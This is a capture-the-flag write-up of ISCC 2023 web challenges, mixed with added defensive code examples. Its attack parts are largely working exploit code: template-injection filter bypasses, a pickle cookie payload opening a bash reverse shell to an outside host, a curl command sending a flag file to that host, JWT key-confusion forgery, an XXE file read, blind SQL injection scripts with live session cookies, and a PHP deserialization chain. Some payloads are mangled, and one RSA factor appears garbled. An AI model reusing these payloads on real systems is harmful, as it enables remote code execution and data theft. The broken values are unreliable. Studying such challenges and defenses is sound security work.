ISCC 2023 Practice Challenges: All Web Problems

1. Enter flag as the input.

fllaaag.txt is discovered.

2. The network response shows that the server is WSGI-based.

Template injection is therefore suspected.

3. Test what the filter blocks.

{{}} cannot be used.

{%print()%} can be used instead.

4. Enter {%print(config)%} to view the configuration.

5. Construct the payload.

(1) +, ., *, _, class, base, globals and most other useful tokens are filtered.

(2) ~ can act as the concatenation operator, and ""["..."] replaces .__ (attribute access through subscripting).

(3) The payload, as recorded. The page's rendering turned the ["..."]() call expressions after __subclasses__, eval and read into bare strings; the two empty calls are restored below, but the argument passed to eval did not survive and is marked as a placeholder:

{%print(""["\x5f\x5fcla""ss\x5f\x5f"]["\x5F\x5Fba""se\x5F\x5F"]["\x5F\x5Fsubcla"~"sses\x5F\x5F"]()[233]["\x5F\x5Fin""it\x5F\x5F"]["\x5F\x5Fglo""bals\x5F\x5F"]["\x5F\x5Fbuil"~"tins\x5F\x5F"]["eval"](<eval argument lost in rendering>)["popen"]("cat flllaag\x2etxt|bas"~"e64")["read"]()%}

(4) Here ""["\x5f\x5fcla"~"ss\x5f\x5f"] => ""["__class__"] => .__class__: the hex escapes rebuild the underscores, and splitting the word keeps the filter from matching it.
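The filter in step 5 matches the blocked words against the raw input, which is why hex escapes, ~ and adjacent string literals get through. As an added Python example (mine, not the challenge's filter), here is the same blocklist applied after canonicalising those three tricks; the sample is the payload above truncated after the __builtins__ lookup, and BLOCKED is the list the write-up reports.

```python
import re

# The tokens the challenge's filter blocked, as listed in the write-up.
BLOCKED = ["+", ".", "*", "_", "class", "base", "globals"]

# Constructed sample: the write-up's payload, truncated after the __builtins__ lookup.
SAMPLE = (r'{%print(""["\x5f\x5fcla""ss\x5f\x5f"]["\x5F\x5Fba""se\x5F\x5F"]'
          r'["\x5F\x5Fsubcla"~"sses\x5F\x5F"]()[233]["\x5F\x5Fin""it\x5F\x5F"]'
          r'["\x5F\x5Fglo""bals\x5F\x5F"]["\x5F\x5Fbuil"~"tins\x5F\x5F"])%}')

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def naive_filter(template: str) -> bool:
    """What the challenge did: substring-match the blocklist against the raw input."""
    return any(token in template for token in BLOCKED)


def normalize(template: str) -> str:
    """Undo the three evasions before matching: \\xNN escapes, "a"~"b" and "a""b" concatenation."""
    text = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), template)  # "\x5f" -> "_"
    text = re.sub(r'"\s*~\s*"', "", text)                                 # "a"~"b" -> "ab"
    text = re.sub(r'"\s*"', "", text)                                     # "a""b" -> "ab"
    return text


def normalizing_filter(template: str) -> bool:
    """The blocklist applied to the canonical form; it catches the sample the naive filter misses."""
    return naive_filter(normalize(template))
```

Canonicalising before matching is still a blocklist, and Jinja offers more than these three ways to build a string (format filters, attr(), character lookups), so the durable fix is to never render user input as template source: pass it as a variable to a fixed template instead.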

web - ISCC内部零元购-2 (ISCC Internal Zero-Cost Purchase, part 2)

Method 1 (unintended solution)

1. The cookie turns out to hold a Python pickle.

2. Most of the content is filtered, but the R (REDUCE) opcode is not.

3. Hand-craft the opcode stream: (Vxxxx\nitimeit\ntimeit\nR.

4. xxxx stands for the code to execute; replace it with __import__('os').system('bash -c "bash -i >& /dev/tcp/zua.tpddns.cn/1234 0<&1 2>&1"')

Its \u-escaped form is:

\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u007a\u0075\u0061\u002e\u0074\u0070\u0064\u0064\u006e\u0073\u002e\u0063\u006e\u002f\u0031\u0032\u0033\u0034\u0020\u0030\u003c\u0026\u0031\u0020\u0032\u003e\u0026\u0031\u0022\u0027\u0029

5. The final payload, loaded locally as a test:

```python
import pickle

payload = b'''(V\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u007a\u0075\u0061\u002e\u0074\u0070\u0064\u0064\u006e\u0073\u002e\u0063\u006e\u002f\u0031\u0032\u0033\u0034\u0020\u0030\u003c\u0026\u0031\u0020\u0032\u003e\u0026\u0031\u0022\u0027\u0029\nitimeit\ntimeit\nR.'''
pickle.loads(payload)
```

The test passes.

6. Base64-encode it:

KFZcdTAwNWZcdTAwNWZcdTAwNjlcdTAwNmRcdTAwNzBcdTAwNmZcdTAwNzJcdTAwNzRcdTAwNWZcdTAwNWZcdTAwMjhcdTAwMjdcdTAwNmZcdTAwNzNcdTAwMjdcdTAwMjlcdTAwMmVcdTAwNzNcdTAwNzlcdTAwNzNcdTAwNzRcdTAwNjVcdTAwNmRcdTAwMjhcdTAwMjdcdTAwNjJcdTAwNjFcdTAwNzNcdTAwNjhcdTAwMjBcdTAwMmRcdTAwNjNcdTAwMjBcdTAwMjJcdTAwNjJcdTAwNjFcdTAwNzNcdTAwNjhcdTAwMjBcdTAwMmRcdTAwNjlcdTAwMjBcdTAwM2VcdTAwMjZcdTAwMjBcdTAwMmZcdTAwNjRcdTAwNjVcdTAwNzZcdTAwMmZcdTAwNzRcdTAwNjNcdTAwNzBcdTAwMmZcdTAwN2FcdTAwNzVcdTAwNjFcdTAwMmVcdTAwNzRcdTAwNzBcdTAwNjRcdTAwNjRcdTAwNmVcdTAwNzNcdTAwMmVcdTAwNjNcdTAwNmVcdTAwMmZcdTAwMzFcdTAwMzJcdTAwMzNcdTAwMzRcdTAwMjBcdTAwMzBcdTAwM2NcdTAwMjZcdTAwMzFcdTAwMjBcdTAwMzJcdTAwM2VcdTAwMjZcdTAwMzFcdTAwMjJcdTAwMjdcdTAwMjkKaXRpbWVpdAp0aW1laXQKUi4

Replace the session value in the cookie with this string to receive the reverse shell.

cat flag.txt to obtain the flag.
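Method 1 succeeds because the server hands the cookie to pickle.loads and filters the stream only by substring, which an INST/REDUCE skeleton slips past. Added example, not from the write-up: a Python pre-check that disassembles the stream with pickletools.genops and flags the opcodes that can resolve or call globals, and a restricted Unpickler whose find_class refuses every import, so the stream above fails before timeit.timeit is ever looked up. The handcrafted sample keeps xxxx as a placeholder; the benign one is a constructed session dict.

```python
import io
import pickle
import pickletools

# Opcodes that resolve globals or call them during loads(); plain data never needs them.
DANGEROUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}

# Constructed samples: the write-up's opcode skeleton with its command left as the xxxx
# placeholder, and an ordinary session dict as the kind of cookie the app should expect.
HANDCRAFTED = b"(Vxxxx\nitimeit\ntimeit\nR."
BENIGN = pickle.dumps({"user": "alice", "cart": [1, 2, 3]})


def dangerous_opcodes(data: bytes) -> list:
    """Statically list the dangerous opcodes in a pickle stream without executing it.
    pickletools.genops only disassembles, so it is safe to run on untrusted input."""
    return [op.name for op, _arg, _pos in pickletools.genops(data) if op.name in DANGEROUS_OPCODES]


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve any module.name: containers, strings and numbers still load, but
    INST/GLOBAL/STACK_GLOBAL can never reach timeit.timeit, os.system or anything else."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_restricted(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True when the restricted loader refuses the stream."""
    try:
        load_restricted(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print("handcrafted:", dangerous_opcodes(HANDCRAFTED), "rejected:", is_rejected(HANDCRAFTED))
    print("benign:", dangerous_opcodes(BENIGN), "loaded:", load_restricted(BENIGN))
```

The opcode scan is the detection layer (log and drop before loading); the restricted loader is the containment layer. Neither makes pickle a safe session format: a signed JSON cookie removes the problem class entirely.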

Method 2 (intended approach)

SSTI (template injection)

1. Download the public key file.

2. Change RS256 to HS256 (key confusion): the RSA public key is supplied as the HMAC secret.

```python
import jwt

PUBLIC_KEY = open('key.txt').read()

payload = {
    "name": "{{cycler.__init__.__globals__.os.popen('cat flag.txt').read()}}",
    "exp": 9902085613,  # expiry time; any value in the future works
}

header = {
    "Access_IP": "10.15.6.211",
    "alg": "HS256",
    "typ": "JWT",
}

encoded = jwt.encode(payload, PUBLIC_KEY, algorithm='HS256', headers=header)
print(encoded)
```

3. Replace the Auth value in the cookie and visit inner (the internal shop) to get the flag.

# inner is the intranet address from the first challenge

http://47.94.14.162:10009/iywqejdbcxnbamolxz238sdk
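Why step 2 works, and what closes it, as an added Python example (mine, not the challenge's server or the script above): the vulnerable verifier reads alg from the token header and feeds its single key blob to whichever algorithm that names, so the public key becomes an HMAC secret; the hardened one pins the algorithm server-side and refuses PEM material as an HMAC key. Everything uses stdlib hmac, so the RS256 check is injected as a callable rather than implemented. PUBLIC_KEY_PEM is a constructed stand-in for the downloaded key, and the forged token carries a harmless claim in place of the SSTI string.

```python
import base64
import hashlib
import hmac
import json

# Constructed stand-in for the downloaded public key; a real one is a full PEM block, but the
# confusion only needs the verifier to hand these bytes to HMAC.
PUBLIC_KEY_PEM = "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n-----END PUBLIC KEY-----\n"


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_token(header: dict, payload: dict, secret: str) -> str:
    """Mint an HS256 token the way the script above does with jwt.encode, here with stdlib hmac."""
    signing_input = _b64url(json.dumps(header).encode()) + "." + _b64url(json.dumps(payload).encode())
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def _split(token: str):
    h, p, s = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p)), f"{h}.{p}".encode(), _b64url_decode(s)


def verify_vulnerable(token: str, key_material: str):
    """The bug: the verifier obeys the alg named in the token and reuses one key blob for every
    algorithm, so the RSA public key doubles as the HMAC secret. Returns the claims or None."""
    header, claims, signing_input, sig = _split(token)
    if header.get("alg") == "HS256":
        expected = hmac.new(key_material.encode(), signing_input, hashlib.sha256).digest()
        return claims if hmac.compare_digest(expected, sig) else None
    return None  # the RS256 branch is not exercised by this example


def verify_hardened(token: str, configured_alg: str, key: str, rsa_verify=None):
    """Fix: the algorithm is a server-side constant, and asymmetric key material is never used as
    an HMAC secret. rsa_verify(key, signing_input, sig) is injected because RSA needs a crypto library."""
    header, claims, signing_input, sig = _split(token)
    if header.get("alg") != configured_alg:
        return None  # alg confusion stops here, before any signature maths
    if configured_alg == "HS256":
        if key.lstrip().startswith("-----BEGIN"):
            raise ValueError("refusing to use PEM key material as an HMAC secret")
        expected = hmac.new(key.encode(), signing_input, hashlib.sha256).digest()
        return claims if hmac.compare_digest(expected, sig) else None
    if configured_alg == "RS256" and rsa_verify is not None:
        return claims if rsa_verify(key, signing_input, sig) else None
    return None


# The confusion from the write-up, with a harmless claim instead of the SSTI string.
FORGED = hs256_token({"alg": "HS256", "typ": "JWT"}, {"name": "guest", "exp": 9902085613}, PUBLIC_KEY_PEM)
```

With a real library the same two rules translate to passing a single-element algorithms list (algorithms=["RS256"]) to decode and keeping HMAC secrets and RSA keys in separate configuration, so no code path can hand one to the other.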

web - ISCC单身节抽奖 (ISCC Singles' Day Lottery)

1. After registering an account, the HTML source contains a base64 string.

Decoding it reveals PHP serialized data.

2. Set the password to ######";s:4:"sdog";i:1;s:8:"username";s:8:"#";}0

This overwrites the sdog variable, making the user a "single dog".

3. Download the stub; it redirects to loadzk1myHJ0vaEoT5U0j6xDOVLBw693g83S.php, which enforces a checktime time limit.

4. Trial and error shows that scientific notation bypasses it: 0.5e5

5. Site files can then be downloaded. Downloading index.php shows it is encrypted.

6. Run a wordlist and download apidemo.php (the XML element tags inside the comment did not survive the page's rendering; only the three tokens below remain):

```php
<?php
// Unfinished part of phase one: the XML query interface apiR554CvL027POp0agxkQ1bBMXnH6Ad1rz.php
// <?xml
//     version="1.0" encoding="utf-8"
// ?>
//
//     rocker
//     singledog
//     4090Ti
?>
```

7. This is an XXE injection vulnerability.

8. Payload (as recorded; the opening of the DOCTYPE declaration and the surrounding elements were stripped when the page was rendered):

<?xml version="1.0" encoding="utf-8"?> <!ENTITY xxe SYSTEM "file:///flag" >]>&xxe;
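The apidemo.php comment points at an endpoint that parses client-supplied XML, which is where the entity above is resolved. As an added Python example (not part of the write-up, and not the PHP the challenge ran), here is the check a defender puts in front of such a parser: reject any document that carries a DTD, since entities can only be declared there, and only then parse it. Both request bodies are constructed; their element names borrow the rocker/singledog/4090Ti tokens left in the comment, the real schema being unknown.

```python
import re
import xml.etree.ElementTree as ET

# Constructed request bodies. The element names follow the three tokens left in the apidemo.php
# comment (rocker, singledog, 4090Ti); the real schema of the interface is not known.
BENIGN_BODY = b'<?xml version="1.0" encoding="utf-8"?><rocker><singledog>4090Ti</singledog></rocker>'
XXE_BODY = (b'<?xml version="1.0" encoding="utf-8"?>'
            b'<!DOCTYPE rocker [<!ENTITY xxe SYSTEM "file:///flag">]>'
            b'<rocker><singledog>&xxe;</singledog></rocker>')

# A data API never needs a DTD, so any DOCTYPE or ENTITY declaration is grounds for rejection.
DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def reject_dtd(body: bytes) -> bool:
    """True when the body declares a DTD, the only place an entity such as &xxe; can be defined."""
    return DTD_MARKERS.search(body) is not None


def parse_request(body: bytes) -> dict:
    """Parse an API body into {tag: text} for the root's children, refusing any DTD first.
    Python's stdlib expat binding does not fetch external entities on its own, but internal
    entity expansion (the billion-laughs family) still applies; banning the DTD removes both."""
    if reject_dtd(body):
        raise ValueError("DTD not allowed in API requests")
    root = ET.fromstring(body)
    return {child.tag: (child.text or "") for child in root}


def is_rejected(body: bytes) -> bool:
    """True when parse_request refuses the body."""
    try:
        parse_request(body)
    except ValueError:
        return True
    return False
```

The byte-level regex assumes the body is in an ASCII-compatible encoding; normalise UTF-16 input to UTF-8 first, or use a parser that disables DTD processing at the parser level (defusedxml in Python, libxml_disable_entity_loader or LIBXML_NONET/LIBXML_NOENT avoidance in PHP), which is the equivalent fix for the challenge's stack.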

web - ISCC疯狂购物节-1 (ISCC Crazy Shopping Festival, part 1)

1. Search the pages for the base64 encoding of 美羊羊: 576O576K576K

```python
import requests
import time

url = "http://47.94.14.162:10001/more/get?page_number="

headers = {
    'Cookie': 'csrftoken=62jDmpFZNKoZOWg44yHc0wOYDIWM2Ha9xiiPpV5PuNcvmJEqBJqorQczHSr7oP7M; sessionid=riu577im8sbtirvkfq9415ov91te7h6z',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
    'Cache-Control': 'max-age=0',
    'Connection': 'keep-alive',
    'Host': '47.94.14.162:10001',
    'Referer': 'http:///47.94.14.162:10001/index/',
    'Upgrade-Insecure-Requests': '1',
}

i = 0
while i < 126:
    i += 1
    try:
        res = requests.get(url + str(i), headers=headers)
    except requests.RequestException:
        i -= 1  # retry the same page instead of reusing a stale response
        continue
    print(i, len(res.text))
    # "too fast": the server rate-limits, so back off; the short reply is retried below
    if len(res.text) == 11:
        time.sleep(0.5)
        print(res.text)
    if "576O576K576K" in res.text:
        print(res.text)
    if len(res.text) < 1000:
        i -= 1
    else:
        # save to a file for later inspection
        with open('./1/' + str(i) + '.txt', 'w') as f:
            f.write(res.text)
```

2. A fl4g field is discovered; brute-force that field character by character.

```python
import requests
import string
from time import sleep

# bypass "are you kidding me"
cookies = {
    'csrftoken': 'Xx1QgCADdjAnhYNOnuV4on7hReuXXfaJ5dPy00n16ZRpegQzpy8XXHSvram7rO31',
    'sessionid': "q7kcs19owhq5nf42cln72dckwocgx3kd",
}

headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6',
    'Cache-Control': 'max-age=0',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',
}


def str_to_hex(s):
    result = ''
    for ch in s:
        result += hex(ord(ch))[2:]
    return result


# the regex filter only allows 0x followed by four characters, so each probe carries the last
# known character plus one candidate: 0x25 <last> <candidate> 25, i.e. the pattern %<last><candidate>%
url = "http://47.94.14.162:10001/Details/search?id=4875610)||fl4g like binary 0x25{}{}25 %23"

alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$&()*+,-./:;<=>?@[]^`{|}~"

result = 'ISCC{'

for i in range(1, 100):
    for ch in alphabet:
        payload = url.format(str_to_hex(result[-1]), str_to_hex(ch))
        print(payload)
        r = requests.get(url=payload, cookies=cookies, headers=headers)
        sleep(1.3)
        if "too fast" in r.text:
            print("too fast")
            sleep(2)
            r = requests.get(url=payload, cookies=cookies, headers=headers)
        if "576O576K576K" in r.text:
            print(payload)
            result += ch
            print("Success:", result)
            break
```

Once the enumeration finishes, the flag is recovered.
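The search endpoint above concatenates the id parameter into the SQL text, which is what lets a closing parenthesis followed by || and a LIKE become a one-character oracle on the fl4g column. Added example, mine rather than the challenge's code, in Python against an in-memory SQLite table (the challenge ran MySQL; the injection mechanics are the same, though SQLite has no LIKE BINARY, so the sample probe uses a quoted pattern): the vulnerable query beside the parameterized one, plus a detector for id parameters shaped like the write-up's probe. Table, column and flag value are constructed.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the shop database; table, column and the fl4g value are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE details (id INTEGER PRIMARY KEY, name TEXT, fl4g TEXT)")
    conn.executemany("INSERT INTO details VALUES (?, ?, ?)",
                     [(1, "milk tea", "ISCC{constructed-sample}"), (2, "cola", None)])
    return conn


def search_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """The pattern behind /Details/search?id=: the parameter is pasted into the SQL text, so a
    closing parenthesis followed by OR (or MySQL's ||) turns it into a boolean oracle on any column."""
    sql = f"SELECT name FROM details WHERE (id = {id_param})"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn: sqlite3.Connection, id_param: str) -> list:
    """Same query with a bound parameter: the input is compared as a value, never parsed as SQL."""
    return [row[0] for row in conn.execute("SELECT name FROM details WHERE (id = ?)", (id_param,))]


# Detection: an id parameter shaped like the write-up's probe
# (close paren, OR or ||, column name, LIKE, optional BINARY, hex literal or %-pattern).
BLIND_PROBE = re.compile(r"\)\s*(\|\||or)\s*\w+\s+like\s+(binary\s+)?(0x[0-9a-f]+|'[^']*%')", re.IGNORECASE)


def looks_like_blind_probe(id_param: str) -> bool:
    """True for request parameters that carry the boolean-oracle shape; useful over access logs."""
    return BLIND_PROBE.search(id_param) is not None
```

The detector is for triage of logs, not a defence: the parameterized query is the fix, and rate limiting (the "too fast" response the scripts work around) only slows the oracle down.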

web - Where_is_your_love

1. Decoding the JS reveals three files:

an encrypted letter.php, a PEM public key, and a PHP deserialization entry point.

2. Build the POP chain.

Reading phpinfo:

http://47.94.14.162:10003/LoveStory.php?iscc=O:3:%22boy%22:1:{s:4:%22like%22;O:4:%22girl%22:1:{s:7:%22boyname%22;O:6:%22helper%22:2:{s:4:%22name%22;O:3:%22boy%22:1:{s:4:%22like%22;O:6:%22helper%22:2:{s:4:%22name%22;N;s:6:%22string%22;a:1:{s:6:%22string%22;s:7:%22phpinfo%22;}}};s:6:%22string%22;s:4:%226666%22;}}}

Using "love_story::love" turns out not to work: the $this variable cannot be set that way.

So use $a = array("string" => [$l, "love"]); instead:

```php
<?php
class boy
{
    public $like;

    public function __destruct()
    {
        echo "能请你喝杯奶茶吗?\n";
        @$this->like->make_friends();
    }

    public function __toString()
    {
        echo "拱火大法好\n";
        return $this->like->string;
    }
}

class girl
{
    private $boyname;

    public function __construct($a)
    {
        $this->boyname = $a;
    }

    public function __call($func, $args)
    {
        echo "我害羞羞\n";
        isset($this->boyname->name);
    }
}

class helper
{
    private $name; #{"string":"love_story::love"}
    private $string;

    public function __construct($a, $string)
    {
        if ($a === 1) {
            $this->name = array('string' => '(new love_story())->love');
            var_dump($this->name);
            var_dump($this->name['string']);
        } else {
            $this->name = $a;
        }
        $this->string = $string;
    }

    public function __isset($val)
    {
        echo "僚机上线\n";
        echo $this->name;
    }

    public function __get($name)
    {
        echo "僚机不懈努力\n";
        $var = $this->name;
        var_dump($var);
        var_dump($var[$name]);
        $var[$name](); #(new love_story())->love()
    }
}

class love_story
{
    public $fall_in_love = array("girl_and_boy");

    public function __construct()
    {
        echo "construct nihao";
    }

    public function love()
    {
        echo "爱情萌芽\n";
        array_walk($this, function ($make, $colo) {
            echo "坠入爱河,给你爱的密码\n";
            if ($make[0] === "girl_and_boy" && $colo === "fall_in_love") {
                global $flag;
                echo $flag;
                echo "good";
            }
        });
    }
}

getcwd();
$b1 = new boy();
$b2 = new boy();
$h1 = new helper($b2, "222");
$g = new girl($h1);
#$a["string"] = "love_story::love";
$l = new love_story();
$a = array("string" => [$l, "love"]);
$h2 = new helper(1, $a);
$b2->like = $h2;
$b1->like = $g;
echo urlencode(serialize($b1));
```

This yields e3e6121b3e253c591ce407333a5e5a04272a58e7175a0b34060a5b28375e270809e13e3e3404

3. Write Python to decrypt the RSA.

p and q are obtained by factoring n on a factoring website.

```python
from Crypto.Util.number import bytes_to_long, long_to_bytes
from Crypto.PublicKey import RSA
import codecs

with open("keyiscc.pem", "rb") as f:
    key = RSA.import_key(f.read())
print(f"n = {key.n}")
print(f"e = {key.e}")

n = 21632595061498942456591176284485458726074437255982049051386399661866343401307576418742779935973203520468696897782308820580710694887656859447653301575912839865540207043886422473424543631000613842175006881377927881354616669050512971265340129939652367389539089568185762381769176974757484155591541925924309034566325122477217195694622210444478497422147703839359963069352123250114163369656862332886519324535078617986837018261033100555378934126290111146362437878180948892817526628614714852292454750429061910217210651682864700027396878086089765753730027466491890569705897416499997534143482201450410155650707746775053846974603
e = 65537
p = 147080233415299360057845495186390765586922902910770748924042642102066002833475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922206967
q = 147080233415299360057845495186390765586922902910770748924042475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922205709

with open('letter.php', 'rb') as f:
    c = f.read()
c = int.from_bytes(c, byteorder='big')

phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(int(m)))

# second stage: undo the byte-wise XOR / offset / reverse / rot13 wrapping of the recovered hex string
flag = 'e3243907335e1c191b5a3705093a5f24582f185f11293b251f082614043e5be516e13e3e3404'
flag1 = ''
for i in range(0, len(flag), 2):
    cc = int(flag[i:i+2], 16)
    b = cc ^ 100
    a = chr(b - 10)
    flag1 += a
print(codecs.decode(flag1[::-1], 'rot13'))
```

Decrypting gives the flag.

web - 上大号说话 (Speak with Your Main Account)

1. Enter 马保国.

A .git directory is found.

Python deserialization.

2. The cookie turns out to be encrypted:

```python
from cryptography.fernet import Fernet
import base64


def crypto(base_str):
    return cipher_suite.encrypt(base_str)


def generate_key(key: str):
    # the key is 4 characters padded with '0' to the 32 bytes Fernet expects,
    # so the whole key space can be enumerated
    key_byte = key.encode()
    # print(key_byte)
    return base64.urlsafe_b64encode(key_byte + b'0' * 28)


def decode(t):
    try:
        print(cipher_suite.decrypt(t))
        print("------------" + all + "-------------------")
    except Exception:
        pass


num = 0
all = ''
for i in '5':
    for j in 'abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890':
        for k in 'abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890':
            for z in 'abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890':
                # print(decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U="))
                all = i + j + k + z
                num += 1
                if num % 10000 == 0:
                    print(all)
                cipher_suite = Fernet(generate_key(all))
                decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U=")
```

Decrypts to 5MbG.

3. There is no output echoed back.

Listen on a public IP:

curl zua.tpddns.cn:1234/cat flagucjbgaxqef.txt|base64

Trying the R opcode: it is filtered.

4. Opcode construction
